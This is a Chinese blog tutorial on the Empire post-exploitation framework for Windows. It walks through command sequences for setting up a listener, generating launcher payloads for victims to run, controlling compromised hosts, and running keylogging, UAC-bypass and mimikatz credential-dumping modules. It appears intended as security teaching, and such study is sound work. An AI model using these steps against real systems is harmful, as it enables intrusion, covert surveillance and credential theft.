后渗透-Empire简单使用

  • A+
所属分类:安全文章
后渗透-Empire简单使用
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚


Empire


Empire一款只针对win系统的后渗透神器,该工具是基于Poweshell脚本的攻击框架
主要实现对内网、对域的攻击,提权横向移动等等

个人感觉和CS、msf使用方法相同
开个监听器,生成payload让主机运行并上线,然后进入主机控制台进行操作主机


地址:http://github.com/EmpireProject/Empire

虽然说针对win平台的,却只能安装在linux系统

linux系统需要有python2.7环境
git clone https://github.com/EmpireProject/Empire.gitsudo ./Empire/setup/install.shsudo ./setup/reset.shsudo ./Empire/empire
推荐docker直接下载安装好的镜像
docker pull empireproject/empiredocker run -it -p 7000:7000 --name empire empireproject/empire /bin/bashsudo ./setup/reset.shsudo ./empire#pip install pefile初始运行可能缺少这个包
后渗透-Empire简单使用
使用过程中注意,Empire对大小写敏感。


设置监听器


监听器的模式很多种,选择完后和配置msf一样配置选项就行
按照习惯,最好进行重命名
(Empire) > listeners(Empire) > uselistenner (tab)(Empire) > uselistener http           #使用http监听(Empire: listeners/http) >set Name test #重命名为test(Empire: listeners/http) >set Host http://192.168.1.1:7000(Empire: listeners/http) >set Port 7000(Empire: listeners/http) >execute #开始监听
后渗透-Empire简单使用
执行execute会启动http://192.168.1.1:7000端口的监听,等待主机上线
后渗透-Empire简单使用
此时看到啊,监听器数目变成1
(Empire) > list listeners
后渗透-Empire简单使用


主机上线


可以生成(poweshell、python)两种payload
(Empire: listeners) > launcher powershell [监听器Name](Empire: listeners) > launcher powershell test
后渗透-Empire简单使用
还可以生成可执行文件啥的
usestager命令调用生成模块,生成指定的可执行文件
(Empire) > usestager windows/launcher_bat [监听器Name] #生成bat文件
后渗透-Empire简单使用
(Empire) > usestager windows/launcher_bat test(Empire: stager/windows/launcher_bat) > info#显示配置项,相当于msf的show options(Empire: stager/windows/launcher_bat) > set #设置配置项,相当于msf的set(Empire: stager/windows/launcher_bat) > execute #运行
然后想方设法的让目标运行此文件就行了
主机上线后会提示有连接主机,agents数目也将变化
后渗透-Empire简单使用
后渗透-Empire简单使用


查看上线主机


输入back回到根操作
输入agents查看已上线主机,有的带星号*的主机是高权限账户
后渗透-Empire简单使用
按照习惯用rename重命名
(Empire: agents) > rename HP79YL2R Win7
后渗透-Empire简单使用
输入interact [主机名]进入目标控制会话
(Empire: agents) > interact Win7(Empire: Win7) > info
后渗透-Empire简单使用


主机控制台


进入目标主机的win7控制台后,help发现很多操作命令
后渗透-Empire简单使用
看了看使用大致和cs相同,运行命令有的会编码报错,后面解决了再说
(Empire: Win7) > sleep 1(Empire: Win7) > getuid
后渗透-Empire简单使用

Empire还有一大功能是很多针对win的模块
使用usemodule进行利用
(Empire: Win7) > usemodule (tab)
后渗透-Empire简单使用
(Empire: Win7) > usemodule collection/screenshot(Empire: powershell/collection/screenshot) > info(Empire: powershell/collection/screenshot) > execute
有的模块会生成一个正在运行的任务job
比如键盘记录collection/keylogger
后渗透-Empire简单使用
back退到win7控制台,通过jobs查看任务
jobsjobs kill [job_name] #停止任务
再使用一下bypassuac提提权
(Empire: Win7) > usemodule privesc/bypassuac(Empire: powershell/privesc/bypassuac) > info(Empire: powershell/privesc/bypassuac) > set Listenner test(Empire: powershell/privesc/bypassuac) > execute -y
后渗透-Empire简单使用
成功的话就返回一台提权的主机了

它这里的mimikatz会自动运行logonpassword
使用creds查看拿到的密码
后渗透-Empire简单使用
这里简单列出几个常用的模块,可以多了解了解这些模块的使用。
collection/screenshot#截屏collection/keylogger#键盘记录collection/clipboard_monitor#剪贴板记录situational_awareness/network/powerview/share_finder#域内所有的共享situational_awareness/host/computerdetails#列举系统中所有有用的信息situational_awareness/network/arpscan #设置range扫描的网段situational_awareness/network/reverse_dns#DNS信息获取situational_awareness/network/powerview/user_hunter#查找域管登陆的机器situation_awareness/network/powerview/find_localadmin_access#本地管理组访问模块privesc/bypassuac #Bypass UACprivesc/pypassuac_wscript#绕过UAC实现管理员权限执行payload。

附视频操作
github下载慢的,公众号回复:empire

本文始发于微信公众号(XG小刚):后渗透-Empire简单使用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: